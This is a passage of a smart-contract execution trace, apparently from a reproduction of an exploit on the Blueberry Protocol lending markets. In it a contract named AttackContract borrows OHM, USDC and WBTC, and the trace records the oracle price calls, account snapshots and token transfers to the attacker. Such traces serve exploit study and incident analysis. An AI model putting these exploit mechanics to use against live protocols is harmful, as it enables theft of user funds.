    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Borrow(borrower: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], borrowAmount: 8616071267266 [8.616e12], accountBorrows: 8616071267266 [8.616e12], totalBorrows: 8616071267266 [8.616e12])
    │   │   │   │   ├─ [408] BlueberryProtocol::borrowVerify(bOHM: [0x08830038A6097C10f4A814274d5A68E64648d91c], AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 8616071267266 [8.616e12])
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0 → 0x000000000000000000000000000000000000000000000000000007d615de03c2
    │   │   │   │   │   @ 11: 0 → 0x000000000000000000000000000000000000000000000000000007d615de03c2
    │   │   │   │   │   @ 19: 0x000000000000000000000000000000000000000000000000000007d615de03c2 → 0
    │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2b: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000000000000007d615de03c2
    │   │   │   │   │   @ 9: 0x0000000000000000000000000000000000000000000000000000000065d70397 → 0x0000000000000000000000000000000000000000000000000000000065d80147
    │   │   │   │   └─ ← [Return] 0
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [328319] bUSDC::borrow(913262603416 [9.132e11])
    │   │   │   ├─ [323015] 0xCa73Bb2d183c4B1b28a108EB36096DC62f0B7e8c::borrow(913262603416 [9.132e11]) [delegatecall]
    │   │   │   │   ├─ [1127] 0xC82151fc8C8f4c8042beea293FeAb8764221d7fD::getBorrowRate(913262603416 [9.132e11], 0, 0) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ emit AccrueInterest(cashPrior: 913262603416 [9.132e11], interestAccumulated: 0, borrowIndex: 1000000000000000000 [1e18], totalBorrows: 0)
    │   │   │   │   ├─ [176638] BlueberryProtocol::borrowAllowed(bUSDC: [0x649127D0800a8c68290129F091564aD2F1D62De1], AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 913262603416 [9.132e11])
    │   │   │   │   │   ├─ emit MarketEntered(rToken: bUSDC: [0x649127D0800a8c68290129F091564aD2F1D62De1], account: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─ [36829] 0x16D43cAC32329ec286Dc14431e0c0E805e6F5174::getUnderlyingPrice(bUSDC: [0x649127D0800a8c68290129F091564aD2F1D62De1]) [staticcall]
    │   │   │   │   │   │   ├─ [2448] bUSDC::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]
    │   │   │   │   │   │   ├─ [33187] 0xdfe469ACe05C3d0D4461439e6cF5d0f46F33Ec56::getPrice(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   │   ├─ [32739] 0x770d3E22703210c09A573c2043081D97286F415E::getPrice(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [29528] 0xC5CEa3f9C92291335076D4C2eC6Ae72E45Fb8937::getPrice(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [29080] 0x5818562bAAC907b859e27813e8c0962d416DAB59::getPrice(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [15643] 0x8fFfFfd4AfB6115b954Bd326cbe7B4BA576818f6::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [7410] 0x789190466E21a8b78b8027866CBBDc151542A26C::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1564, 100001644 [1e8], 1708588847 [1.708e9], 1708588847 [1.708e9], 1564
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419104796 [3.689e19], 100001644 [1e8], 1708588847 [1.708e9], 1708588847 [1.708e9], 36893488147419104796 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0c5a763c03000
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0c5a763c03000
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0c5a763c03000
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0c5a763c03000
    │   │   │   │   │   │   └─ ← [Return] 1000016440000000000 [1e18]
    │   │   │   │   │   ├─ [6029] bWETH::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   ├─ [4526] bWETH::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   ├─ [2641] 0x3eEDb4396387032F03d04Fd0DB1887f6B76d7BFA::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0, 9999999999 [9.999e9], 0, 100000000002351019073516055 [1e26]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002540be3ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000052b7d2dcd067102cbcb217
    │   │   │   │   │   │   └─ ← [Return] 0, 9999999999 [9.999e9], 0, 100000000002351019073516055 [1e26]
    │   │   │   │   │   ├─ [9916] 0x16D43cAC32329ec286Dc14431e0c0E805e6F5174::getUnderlyingPrice(bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2]) [staticcall]
    │   │   │   │   │   │   ├─ [448] bWETH::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]
    │   │   │   │   │   │   ├─ [8274] 0xdfe469ACe05C3d0D4461439e6cF5d0f46F33Ec56::getPrice(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [staticcall]
    │   │   │   │   │   │   │   ├─ [7826] 0x770d3E22703210c09A573c2043081D97286F415E::getPrice(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [6615] 0xC5CEa3f9C92291335076D4C2eC6Ae72E45Fb8937::getPrice(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [6167] 0x5818562bAAC907b859e27813e8c0962d416DAB59::getPrice(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3235] 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1502] 0xE62B71cf983019BFf55bC83B48601ce8419650CC::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 12117 [1.211e4], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 12117 [1.211e4]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 110680464442257321813 [1.106e20], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 110680464442257321813 [1.106e20]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000a1acd8bec2a90c3800
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000a1acd8bec2a90c3800
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000a1acd8bec2a90c3800
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000a1acd8bec2a90c3800
    │   │   │   │   │   │   └─ ← [Return] 2982380710380000000000 [2.982e21]
    │   │   │   │   │   ├─ [6807] bOHM::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   ├─ [5304] bOHM::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   ├─ [3419] 0xba4aB7577d4B4D4a4E9Fad4dc40564C6E5c9e365::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0, 0, 8616071267266 [8.616e12], 100000000000000000 [1e17]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007d615de03c2000000000000000000000000000000000000000000000000016345785d8a0000
    │   │   │   │   │   │   └─ ← [Return] 0, 0, 8616071267266 [8.616e12], 100000000000000000 [1e17]
    │   │   │   │   │   ├─ [15227] 0x16D43cAC32329ec286Dc14431e0c0E805e6F5174::getUnderlyingPrice(bOHM: [0x08830038A6097C10f4A814274d5A68E64648d91c]) [staticcall]
    │   │   │   │   │   │   ├─ [448] bOHM::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]
    │   │   │   │   │   │   ├─ [13585] 0xdfe469ACe05C3d0D4461439e6cF5d0f46F33Ec56::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [staticcall]
    │   │   │   │   │   │   │   ├─ [13137] 0x770d3E22703210c09A573c2043081D97286F415E::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [11926] 0xC5CEa3f9C92291335076D4C2eC6Ae72E45Fb8937::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [11478] 0x5818562bAAC907b859e27813e8c0962d416DAB59::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x9a72298ae3886221820B1c878d12D872087D3a23::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x9Aae856973A0Cafa084b82F7BC4C6C2893A9139b::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 2282, 4283433884210516 [4.283e15], 1708588835 [1.708e9], 1708588835 [1.708e9], 2282
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 18446744073709553898 [1.844e19], 4283433884210516 [4.283e15], 1708588835 [1.708e9], 1708588835 [1.708e9], 18446744073709553898 [1.844e19]
    │   │   │   │   │   │   │   │   │   │   ├─ [3235] 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1502] 0xE62B71cf983019BFf55bC83B48601ce8419650CC::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 12117 [1.211e4], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 12117 [1.211e4]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 110680464442257321813 [1.106e20], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 110680464442257321813 [1.106e20]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   └─ ← [Return] 12774830590457521373 [1.277e19]
    │   │   │   │   │   ├─ [14030] bUSDC::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   ├─ [12527] bUSDC::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   ├─ [10642] 0xCa73Bb2d183c4B1b28a108EB36096DC62f0B7e8c::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 100000000000000 [1e14]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005af3107a4000
    │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 100000000000000 [1e14]
    │   │   │   │   │   ├─ [9829] 0x16D43cAC32329ec286Dc14431e0c0E805e6F5174::getUnderlyingPrice(bUSDC: [0x649127D0800a8c68290129F091564aD2F1D62De1]) [staticcall]
    │   │   │   │   │   │   ├─ [448] bUSDC::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]
    │   │   │   │   │   │   ├─ [8187] 0xdfe469ACe05C3d0D4461439e6cF5d0f46F33Ec56::getPrice(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   │   ├─ [7739] 0x770d3E22703210c09A573c2043081D97286F415E::getPrice(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [6528] 0xC5CEa3f9C92291335076D4C2eC6Ae72E45Fb8937::getPrice(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [6080] 0x5818562bAAC907b859e27813e8c0962d416DAB59::getPrice(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x8fFfFfd4AfB6115b954Bd326cbe7B4BA576818f6::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x789190466E21a8b78b8027866CBBDc151542A26C::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1564, 100001644 [1e8], 1708588847 [1.708e9], 1708588847 [1.708e9], 1564
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419104796 [3.689e19], 100001644 [1e8], 1708588847 [1.708e9], 1708588847 [1.708e9], 36893488147419104796 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0c5a763c03000
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0c5a763c03000
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0c5a763c03000
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0c5a763c03000
    │   │   │   │   │   │   └─ ← [Return] 1000016440000000000 [1e18]
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 2 → 3
    │   │   │   │   │   │   @ 0x67a879b215580631aeb8fc0c80e823ff978dcfc0f1aafe5d21887ba2a3a6e071: 0 → 1
    │   │   │   │   │   │   @ 0x86581590abc6f15fce38bf279cf1cbd925284db42a8dc4adfd579fead3ff779d: 0 → 0x000000000000000000000000649127d0800a8c68290129f091564ad2f1d62de1
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [40652] USDC::transfer(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 913262603416 [9.132e11])
    │   │   │   │   │   ├─ [33363] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transfer(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 913262603416 [9.132e11]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Transfer(from: bUSDC: [0x649127D0800a8c68290129F091564aD2F1D62De1], to: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 913262603416 [9.132e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xaa5aef36a5b88c9f88d68e6b831128fafd576d00483b9e3e2bde1728a11b7cf1: 0x000000000000000000000000000000000000000000000000000000d4a2b16c98 → 0
    │   │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x000000000000000000000000000000000000000000000000000000d4a2b16c98
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Borrow(borrower: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], borrowAmount: 913262603416 [9.132e11], accountBorrows: 913262603416 [9.132e11], totalBorrows: 913262603416 [9.132e11])
    │   │   │   │   ├─ [408] BlueberryProtocol::borrowVerify(bUSDC: [0x649127D0800a8c68290129F091564aD2F1D62De1], AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 913262603416 [9.132e11])
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 9: 0x0000000000000000000000000000000000000000000000000000000065d7769f → 0x0000000000000000000000000000000000000000000000000000000065d80147
    │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2b: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x000000000000000000000000000000000000000000000000000000d4a2b16c98
    │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0 → 0x000000000000000000000000000000000000000000000000000000d4a2b16c98
    │   │   │   │   │   @ 11: 0 → 0x000000000000000000000000000000000000000000000000000000d4a2b16c98
    │   │   │   │   │   @ 19: 0x000000000000000000000000000000000000000000000000000000d4a2b16c98 → 0
    │   │   │   │   └─ ← [Return] 0
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [341969] bWBTC::borrow(686690100 [6.866e8])
    │   │   │   ├─ [336665] 0x387815ebA6097060cCAb0d1dff547Dd46cb34F78::borrow(686690100 [6.866e8]) [delegatecall]
    │   │   │   │   ├─ [1127] 0xC82151fc8C8f4c8042beea293FeAb8764221d7fD::getBorrowRate(686690100 [6.866e8], 0, 0) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ emit AccrueInterest(cashPrior: 686690100 [6.866e8], interestAccumulated: 0, borrowIndex: 1000000000000000000 [1e18], totalBorrows: 0)
    │   │   │   │   ├─ [198137] BlueberryProtocol::borrowAllowed(bWBTC: [0xE61ad5B0E40c856E6C193120Bd3fa28A432911B6], AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 686690100 [6.866e8])
    │   │   │   │   │   ├─ emit MarketEntered(rToken: bWBTC: [0xE61ad5B0E40c856E6C193120Bd3fa28A432911B6], account: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─ [36921] 0x16D43cAC32329ec286Dc14431e0c0E805e6F5174::getUnderlyingPrice(bWBTC: [0xE61ad5B0E40c856E6C193120Bd3fa28A432911B6]) [staticcall]
    │   │   │   │   │   │   ├─ [2448] bWBTC::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599]
    │   │   │   │   │   │   ├─ [33279] 0xdfe469ACe05C3d0D4461439e6cF5d0f46F33Ec56::getPrice(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599]) [staticcall]
    │   │   │   │   │   │   │   ├─ [32831] 0x770d3E22703210c09A573c2043081D97286F415E::getPrice(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [29620] 0xC5CEa3f9C92291335076D4C2eC6Ae72E45Fb8937::getPrice(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599]) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [29172] 0x5818562bAAC907b859e27813e8c0962d416DAB59::getPrice(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [15735] 0xF4030086522a5bEEa4988F8cA5B36dbC97BeE88c::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [7502] 0xdBe1941BFbe4410D6865b9b7078e0b49af144D2d::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 11572 [1.157e4], 5134223706061 [5.134e12], 1708653335 [1.708e9], 1708653335 [1.708e9], 11572 [1.157e4]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 110680464442257321268 [1.106e20], 5134223706061 [5.134e12], 1708653335 [1.708e9], 1708653335 [1.708e9], 110680464442257321268 [1.106e20]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000adf44abe7cb62c19400
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000adf44abe7cb62c19400
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000adf44abe7cb62c19400
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000adf44abe7cb62c19400
    │   │   │   │   │   │   └─ ← [Return] 51342237060610000000000 [5.134e22]
    │   │   │   │   │   ├─ [6029] bWETH::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   ├─ [4526] bWETH::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   ├─ [2641] 0x3eEDb4396387032F03d04Fd0DB1887f6B76d7BFA::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0, 9999999999 [9.999e9], 0, 100000000002351019073516055 [1e26]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002540be3ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000052b7d2dcd067102cbcb217
    │   │   │   │   │   │   └─ ← [Return] 0, 9999999999 [9.999e9], 0, 100000000002351019073516055 [1e26]
    │   │   │   │   │   ├─ [9916] 0x16D43cAC32329ec286Dc14431e0c0E805e6F5174::getUnderlyingPrice(bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2]) [staticcall]
    │   │   │   │   │   │   ├─ [448] bWETH::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]
    │   │   │   │   │   │   ├─ [8274] 0xdfe469ACe05C3d0D4461439e6cF5d0f46F33Ec56::getPrice(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [staticcall]
    │   │   │   │   │   │   │   ├─ [7826] 0x770d3E22703210c09A573c2043081D97286F415E::getPrice(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [6615] 0xC5CEa3f9C92291335076D4C2eC6Ae72E45Fb8937::getPrice(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [6167] 0x5818562bAAC907b859e27813e8c0962d416DAB59::getPrice(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3235] 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1502] 0xE62B71cf983019BFf55bC83B48601ce8419650CC::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 12117 [1.211e4], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 12117 [1.211e4]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 110680464442257321813 [1.106e20], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 110680464442257321813 [1.106e20]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000a1acd8bec2a90c3800
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000a1acd8bec2a90c3800
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000a1acd8bec2a90c3800
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000a1acd8bec2a90c3800
    │   │   │   │   │   │   └─ ← [Return] 2982380710380000000000 [2.982e21]
    │   │   │   │   │   ├─ [6807] bOHM::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   ├─ [5304] bOHM::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   ├─ [3419] 0xba4aB7577d4B4D4a4E9Fad4dc40564C6E5c9e365::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0, 0, 8616071267266 [8.616e12], 100000000000000000 [1e17]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007d615de03c2000000000000000000000000000000000000000000000000016345785d8a0000
    │   │   │   │   │   │   └─ ← [Return] 0, 0, 8616071267266 [8.616e12], 100000000000000000 [1e17]
    │   │   │   │   │   ├─ [15227] 0x16D43cAC32329ec286Dc14431e0c0E805e6F5174::getUnderlyingPrice(bOHM: [0x08830038A6097C10f4A814274d5A68E64648d91c]) [staticcall]
    │   │   │   │   │   │   ├─ [448] bOHM::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]
    │   │   │   │   │   │   ├─ [13585] 0xdfe469ACe05C3d0D4461439e6cF5d0f46F33Ec56::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [staticcall]
    │   │   │   │   │   │   │   ├─ [13137] 0x770d3E22703210c09A573c2043081D97286F415E::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [11926] 0xC5CEa3f9C92291335076D4C2eC6Ae72E45Fb8937::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [11478] 0x5818562bAAC907b859e27813e8c0962d416DAB59::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x9a72298ae3886221820B1c878d12D872087D3a23::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x9Aae856973A0Cafa084b82F7BC4C6C2893A9139b::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 2282, 4283433884210516 [4.283e15], 1708588835 [1.708e9], 1708588835 [1.708e9], 2282
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 18446744073709553898 [1.844e19], 4283433884210516 [4.283e15], 1708588835 [1.708e9], 1708588835 [1.708e9], 18446744073709553898 [1.844e19]
    │   │   │   │   │   │   │   │   │   │   ├─ [3235] 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419::latestRoundData() [staticcall]
